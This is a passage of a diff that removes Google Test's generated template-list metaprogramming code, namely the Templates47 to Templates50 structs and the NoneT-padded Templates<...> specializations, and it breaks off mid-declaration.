-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48>
-struct Templates48 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates47<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49>
-struct Templates49 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates48<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48, T49> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49, GTEST_TEMPLATE_ T50>
-struct Templates50 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates49<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48, T49, T50> Tail;
-};
-
-
-// We don't want to require the users to write TemplatesN<...> directly,
-// as that would require them to count the length.  Templates<...> is much
-// easier to write, but generates horrible messages when there is a
-// compiler error, as gcc insists on printing out each template
-// argument, even if it has the default value (this means Templates<list>
-// will appear as Templates<list, NoneT, NoneT, ..., NoneT> in the compiler
-// errors).
-//
-// Our solution is to combine the best part of the two approaches: a
-// user would write Templates<T1, ..., TN>, and Google Test will translate
-// that to TemplatesN<T1, ..., TN> internally to make error messages
-// readable.  The translation is done by the 'type' member of the
-// Templates template.
-template <GTEST_TEMPLATE_ T1 = NoneT, GTEST_TEMPLATE_ T2 = NoneT,
-    GTEST_TEMPLATE_ T3 = NoneT, GTEST_TEMPLATE_ T4 = NoneT,
-    GTEST_TEMPLATE_ T5 = NoneT, GTEST_TEMPLATE_ T6 = NoneT,
-    GTEST_TEMPLATE_ T7 = NoneT, GTEST_TEMPLATE_ T8 = NoneT,
-    GTEST_TEMPLATE_ T9 = NoneT, GTEST_TEMPLATE_ T10 = NoneT,
-    GTEST_TEMPLATE_ T11 = NoneT, GTEST_TEMPLATE_ T12 = NoneT,
-    GTEST_TEMPLATE_ T13 = NoneT, GTEST_TEMPLATE_ T14 = NoneT,
-    GTEST_TEMPLATE_ T15 = NoneT, GTEST_TEMPLATE_ T16 = NoneT,
-    GTEST_TEMPLATE_ T17 = NoneT, GTEST_TEMPLATE_ T18 = NoneT,
-    GTEST_TEMPLATE_ T19 = NoneT, GTEST_TEMPLATE_ T20 = NoneT,
-    GTEST_TEMPLATE_ T21 = NoneT, GTEST_TEMPLATE_ T22 = NoneT,
-    GTEST_TEMPLATE_ T23 = NoneT, GTEST_TEMPLATE_ T24 = NoneT,
-    GTEST_TEMPLATE_ T25 = NoneT, GTEST_TEMPLATE_ T26 = NoneT,
-    GTEST_TEMPLATE_ T27 = NoneT, GTEST_TEMPLATE_ T28 = NoneT,
-    GTEST_TEMPLATE_ T29 = NoneT, GTEST_TEMPLATE_ T30 = NoneT,
-    GTEST_TEMPLATE_ T31 = NoneT, GTEST_TEMPLATE_ T32 = NoneT,
-    GTEST_TEMPLATE_ T33 = NoneT, GTEST_TEMPLATE_ T34 = NoneT,
-    GTEST_TEMPLATE_ T35 = NoneT, GTEST_TEMPLATE_ T36 = NoneT,
-    GTEST_TEMPLATE_ T37 = NoneT, GTEST_TEMPLATE_ T38 = NoneT,
-    GTEST_TEMPLATE_ T39 = NoneT, GTEST_TEMPLATE_ T40 = NoneT,
-    GTEST_TEMPLATE_ T41 = NoneT, GTEST_TEMPLATE_ T42 = NoneT,
-    GTEST_TEMPLATE_ T43 = NoneT, GTEST_TEMPLATE_ T44 = NoneT,
-    GTEST_TEMPLATE_ T45 = NoneT, GTEST_TEMPLATE_ T46 = NoneT,
-    GTEST_TEMPLATE_ T47 = NoneT, GTEST_TEMPLATE_ T48 = NoneT,
-    GTEST_TEMPLATE_ T49 = NoneT, GTEST_TEMPLATE_ T50 = NoneT>
-struct Templates {
-  typedef Templates50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48, T49, T50> type;
-};
-
-template <>
-struct Templates<NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates0 type;
-};
-template <GTEST_TEMPLATE_ T1>
-struct Templates<T1, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates1<T1> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2>
-struct Templates<T1, T2, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates2<T1, T2> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3>
-struct Templates<T1, T2, T3, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates3<T1, T2, T3> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4>
-struct Templates<T1, T2, T3, T4, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates4<T1, T2, T3, T4> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5>
-struct Templates<T1, T2, T3, T4, T5, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates5<T1, T2, T3, T4, T5> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6>
-struct Templates<T1, T2, T3, T4, T5, T6, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates6<T1, T2, T3, T4, T5, T6> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates7<T1, T2, T3, T4, T5, T6, T7> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates8<T1, T2, T3, T4, T5, T6, T7, T8> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates9<T1, T2, T3, T4, T5, T6, T7, T8, T9> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
